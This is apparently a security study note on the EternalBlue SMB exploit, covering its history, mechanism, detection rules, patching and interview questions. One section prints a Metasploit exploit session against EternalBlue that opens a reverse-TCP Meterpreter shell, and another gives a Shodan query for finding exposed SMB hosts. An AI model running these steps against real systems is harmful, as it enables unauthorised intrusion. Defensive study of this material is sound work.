EternalBlue
EternalBlue
One-liner: NSA-developed exploit for Windows SMB vulnerability (CVE-2017-0144) leaked by Shadow Brokers, used by WannaCry and NotPetya.
🎯 What Is It?
EternalBlue is a sophisticated exploit developed by the NSA's Equation Group that targets a critical vulnerability in Microsoft's Server Message Block (SMB) protocol. It allows remote code execution without authentication, enabling attackers to gain SYSTEM-level access and spread malware across networks. It became infamous after being leaked and weaponized in the WannaCry ransomware outbreak.
🐛 The Vulnerability
CVE-2017-0144
- Product: Windows SMBv1 (Server Message Block version 1)
- Type: Remote Code Execution (RCE)
- CVSS Score: 9.3 (Critical)
- Affected Systems:
- Windows XP
- Windows Vista
- Windows 7
- Windows 8
- Windows 10 (pre-patch)
- Windows Server 2003-2016
Technical Root Cause
Buffer Overflow in SMBv1 Protocol
Vulnerability: Improper handling of specially crafted packets
Location: srv.sys (SMB driver)
Impact: Kernel memory corruption → RCE as SYSTEM
The vulnerability exists in how Windows handles SMB packets with malformed transaction requests, allowing attackers to overflow buffers and execute arbitrary code in kernel space.
⏱️ Timeline
| Date | Event |
|---|---|
| Pre-2013 | NSA develops EternalBlue exploit |
| 2013-2016 | NSA uses EternalBlue for intelligence operations |
| Aug 2016 | Shadow Brokers steal NSA tools (claimed) |
| March 14, 2017 | Microsoft releases patch MS17-010 |
| April 14, 2017 | Shadow Brokers publicly release EternalBlue |
| May 12, 2017 | WannaCry outbreak using EternalBlue |
| June 27, 2017 | NotPetya outbreak using EternalBlue |
| 2017-Present | EternalBlue still actively exploited |
🛠️ How EternalBlue Works
Exploitation Flow
1. Attacker scans for SMB (port 445)
↓
2. Send specially crafted SMB packets
↓
3. Trigger buffer overflow in srv.sys
↓
4. Overwrite kernel memory
↓
5. Execute shellcode as SYSTEM
↓
6. Install backdoor (DoublePulsar)
↓
7. Deploy payload (ransomware, etc.)
Technical Details
Stage 1: Initial Exploit Packets
SMB_COM_TRANSACTION2 request with:
- Large buffer size (0xFFFF)
- Malformed parameters
- Heap grooming payloads
Stage 2: Shellcode Injection
- Exploit sprays kernel heap with shellcode
- Overwrites kernel HAL (Hardware Abstraction Layer) pointers
- Redirects execution to attacker-controlled code
Stage 3: Payload Delivery
- Often paired with DoublePulsar backdoor
- Installs persistent access
- Deploys final payload (ransomware, cryptominer, etc.)
🔥 Notable Attacks Using EternalBlue
1. WannaCry (May 2017)
- Impact: 300,000+ systems in 150 countries
- Damage: $4 billion+
- Vector: EternalBlue worm propagation
- Attacker: North Korea (Lazarus Group)
2. NotPetya (June 2017)
- Impact: $10 billion+ damages (worst cyberattack in history)
- Victims: Maersk, Merck, FedEx, Mondelez
- Vector: EternalBlue + MeDoc software supply chain
- Attacker: Russia (attributed)
3. Cryptominers (2017-Present)
- EternalMiner, Adylkuzz
- Silently mine cryptocurrency on infected systems
4. Emotet / TrickBot (2018-2020)
- Banking trojans using EternalBlue for Lateral Movement
🔍 Detection
Network Detection
Snort Rule:
alert tcp any any -> any 445 (
msg:"EternalBlue Exploit Attempt";
content:"|FF|SMB";
content:"|2F 00 00 00 00|";
sid:1000001;
)
Sysmon Detection
EventID: 3 (Network Connection)
Image: System
DestinationPort: 445
Initiated: true
EventID: 7 (Driver Load)
ImageLoaded: *\srv.sys
Signature: Suspicious or unsigned
EDR Indicators
- Unusual SMB traffic patterns
srv.syscrashes- Kernel memory corruption events
- DoublePulsar implant (rundll32 SMB payload injection)
Exploitation Artifacts
Registry:
HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\EnableICMPRedirect
Files:
- Unusual DLLs in
%SystemRoot% - Temp files with shellcode
Memory:
- Kernel heap spray signatures
- [[DoublePulsar]] XOR key
0x75A31CF2
🛡️ Prevention & Mitigation
1. Patch Immediately
MS17-010 (March 2017)
# Check if patch installed
Get-HotFix -Id KB4012212, KB4012215, KB4012213, KB4012214, KB4012217, KB4012216, KB4013198, KB4013429
Microsoft released emergency patches even for unsupported systems (XP, Server 2003).
2. Disable SMBv1
# Disable SMBv1
Set-SmbServerConfiguration -EnableSMB1Protocol $false
# Verify
Get-SmbServerConfiguration | Select EnableSMB1Protocol
3. Firewall Rules
Block SMB externally:
# Block port 445 (SMB)
iptables -A INPUT -p tcp --dport 445 -j DROP
# Windows Firewall
New-NetFirewallRule -DisplayName "Block SMB" -Direction Inbound -Protocol TCP -LocalPort 445 -Action Block
4. Network Segmentation
- Isolate critical systems
- Prevent Lateral Movement
- Segment OT/ICS networks
5. IPS / EDR
- Detect exploitation attempts
- Block malicious SMB packets
6. Monitor SMB Traffic
- Unusual port 445 activity
- SMB traffic to unexpected hosts
🔬 Testing for Vulnerability
Metasploit Scanner
msf6 > use auxiliary/scanner/smb/smb_ms17_010
msf6 auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 192.168.1.0/24
msf6 auxiliary(scanner/smb/smb_ms17_010) > run
Nmap NSE Script
nmap -p445 --script smb-vuln-ms17-010 192.168.1.0/24
Manual Check
# Check if patch installed
wmic qfe list | findstr KB4012212
🏆 Metasploit Exploitation
msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 exploit(ms17_010_eternalblue) > set RHOSTS 192.168.1.100
msf6 exploit(ms17_010_eternalblue) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf6 exploit(ms17_010_eternalblue) > set LHOST 192.168.1.50
msf6 exploit(ms17_010_eternalblue) > exploit
[*] Started reverse TCP handler on 192.168.1.50:4444
[*] Target OS: Windows 7 Professional 7601 Service Pack 1
[*] Sending stage (200774 bytes) to 192.168.1.100
[*] Meterpreter session 1 opened
🎯 Why It's Still a Threat (2025)
Despite patch availability since 2017:
- Legacy systems still unpatched
- IoT devices running embedded Windows
- Air-gapped networks never updated
- ICS/SCADA systems can't be patched easily
- 30%+ of internet-facing SMB still vulnerable (Shodan)
# Shodan query for vulnerable systems
shodan search "port:445 os:windows"
🎤 Interview Angles
Q: What is EternalBlue and why is it significant?
- NSA-developed exploit for Windows SMB (CVE-2017-0144)
- Leaked by Shadow Brokers in April 2017
- Enabled WannaCry (300K+ systems) and NotPetya ($10B+ damage)
- Remote code execution as SYSTEM without authentication
- Still actively exploited despite patch availability since March 2017
Q: How would you detect EternalBlue exploitation in your network?
STAR Example:
Situation: Need to detect EternalBlue attempts after WannaCry outbreak.
Task: Implement detection across network and endpoints.
Action:
- Deployed Snort IPS rules for malformed SMB packets
- Configured Sysmon to alert on srv.sys crashes and unusual SMB activity
- Created Splunk correlation rule: port 445 scanning + srv.sys events
- Scanned network with Nmap for vulnerable systems
Result: Detected 12 vulnerable systems, patched immediately; blocked 3 external exploitation attempts in first month.
Q: Why is EternalBlue still a threat years later?
- Legacy systems (XP, Server 2003) still deployed
- ICS/SCADA environments can't patch without downtime
- Air-gapped networks never receive updates
- SMBv1 still enabled by default on many systems
- 30%+ of internet-facing SMB endpoints remain vulnerable
🔗 Related Concepts
- CVE-2017-0144 — The SMB vulnerability
- WannaCry — Famous ransomware outbreak
- Shadow Brokers — Leak source
- Malware Analysis — Analyzing exploits
- Lateral Movement — Post-exploitation use
- Metasploit — Exploitation framework